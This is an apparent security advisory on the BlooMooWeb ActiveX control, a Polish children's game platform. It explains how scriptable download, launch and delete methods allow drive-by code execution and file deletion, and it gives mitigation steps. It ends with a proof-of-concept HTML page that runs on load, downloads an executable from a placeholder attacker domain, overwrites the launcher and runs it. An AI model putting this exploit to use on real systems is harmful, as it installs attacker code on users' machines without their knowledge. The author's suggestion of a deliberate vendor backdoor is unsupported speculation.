There is a security problem within the architecture / design issues of the BlooMooWeb ActiveX control. BlooMooWeb is an internet game platform for kids, popular mainly in Poland. It has been provided for the TV programme "Krolestwo Maciusia" ("The Kingdom of Macius") broadcast in TVP1 - first channel of Polish public television. The flaws allows any malicious person who would induce the remote user to click specified link, to download silently and immediately execute any attacker supplied code, in the current user context. Technical description: BlooMooWeb ActiveX control, using the CLSID idetifier CLSID: 22E9EFBA-114C-4DA0-AE72-D8F2C7138002, is being used by the web platform to download and install the game system files and later for particular game downloading / instalation purposes. After game system is installed (installation of ActiveX control has been approved / BlooMooWeb platform has been downloaded and installed) the game system binaries and data are stored in the following directory: C:/Program Files/AidemMedia/BlooMooWeb and the default launch path is set to that directory. Following 3 methods, being used for the scripting layer in data download / installation process, could be particularly intresting: BW_DownloadFile(BSTR bstrUrl, BSTR bstrLocalFile,BSTR bstrCallback) BW_LaunchGame(BSTR bstrParams) BW_DeleteTempFile(BSTR filePath) First of all it has to be said, that the control implemetation doesn't have any protection allowing to distinguish between game platform data area and users system data area. Therfore any path parameters passed to the controls methods can point anywhere outside the local installation place on the users harddrive. BW_DownloadFile() method, using non-blocking streaming with callback system, downloads a remote file specified by the URL string bstrUrL parameter, streaming it down with the overwrite IO permission to the file pointed to by the bstrLocalFile parameter. The third parameter is a callback function pointer which can be used to track visually(GUI) / silently the download progress. The call to BW_LaunchGame method with any string argument will result in execution of the: %BlooMooWebDirectory%/BlooMooWeb.exe binary (game platform core executable) and new process spawning in the current user context. After noticing that the control has only callbacks system and no GUI it should be a simple deal to execute it silently with no user interaction or signaling. However, having full scripting access to the method that downloads any data with overwrite IO permission (including binaries) with no user interaction, to any directory on the users physical disk, it can be used to overwrite the default game-launcher binary BlooMooWeb.exe by an attacker chosen file. After that, any single call to BW_LaunchGame() will spawn new process from the attackers supplied binary file. Simplyfying - with just one users click on the attacker provided link, the attacker supplied executable code (containing trojan-horse, virus, spy stuff, adWare, etc. ) can be downloaded silently and instantly executed within the users account privillages. DoS type attack vector is introduced by BW_DeleteTempFile() method, not embedded with the internal ActiveX installer system, but available externally for scripting. It is used by the game installer engine to delete files after game deinstallation and in other cleanup purposes. It uses a single string argument, which can point to ANY file on the users physical disk. That introduces another "creepy" scenario where the user induced by the malicious attacker to visit attacker-controlled site can simply by one-click on the link , wipe any data from own disk including erasing operating system core files leading to users OS crash. Concluding: The BlooMooWeb web game platform has been designed by gaming company and TV producer - Aidem Media and started in January 2006 as a part of public Polish television show for kids called "Krolestwo Maciusia". Since then it gained over 12000 forum registered users, with web chat, forums and ICQ/GG messaging prototocols indetity tracking. Excluding the users that had their operating systems reinstalled or had chanded the ActiveX security policy of their browser since the game platform intallation, it could be expected that this web game system is wide spread and has rather big audience, in and outside Poland. Taking into consideration that a TV supported / owned game platform makes itself trustworthy enough to approve ActiveX control installation, the origins of flaw in this software, could be interpreted in two ways: as an accidental security vulnerability being a result of bad architecture design, or as a backdoor system into platform users machines, "accidentally" built in by the vendor. Affected software: Windows 98 SE Windows 2000 SP4 Windows XP pro SP2 Windows 2003 Server Standard SP1 BlooMooWeb ActiveX CTL v1.0.9 Example PoC exploit showing remote execution of attacker supplied binary code: <html> <head> <script language="JavaScript"> var binaryUrl="http://some_attacker_controlled_domain/attackerfile.exe"; function spawn2() { aa1=o2obj.GetInstallationDir(null); aa2="BlooMooWEB.exe"; o2obj.BW_DownloadFile(binaryUrl,aa1+aa2,"callback001"); } function callback001( msgCode, param1, param2, param3 ) { if(msgCode == 'DOWNLOAD_COMPLETE' ) { o2obj.BW_LaunchGame("treleferekuku"); } } </script> </head> <body onload="spawn2()"> <object ID="o2obj" WIDTH=0 HEIGHT=0 CLASSID="CLSID:22E9EFBA-114C-4DA0-AE72-D8F2C7138002" </object> </body> </html> Solution: -removal of BlooMooWeb ActiveX control binary, placed in: %WindowsDirectory%/dowloaded program files/AidemATL.dll -turning off entirely ActiveX in the Browser settings (or switching the browser to a non-Microsoft one and forgetting about MS suicidal inventions) -thinking twice before installation approval of any ActiveX driven software either unsigned or wide spread "big corp" signed Links: "The Kingdom of Macius" TV show official web page: http://www.krolestwomaciusia.pl BlooMooWeb game portal: http://www.krolestwomaciusia.pl/bweb_aktualnosci.php Polish public television main web page: http://www.tvp.pl information provided by Max Gipehtykrop of German Reverse Force maxgipeh (at) yahoo (dot) com [email concealed]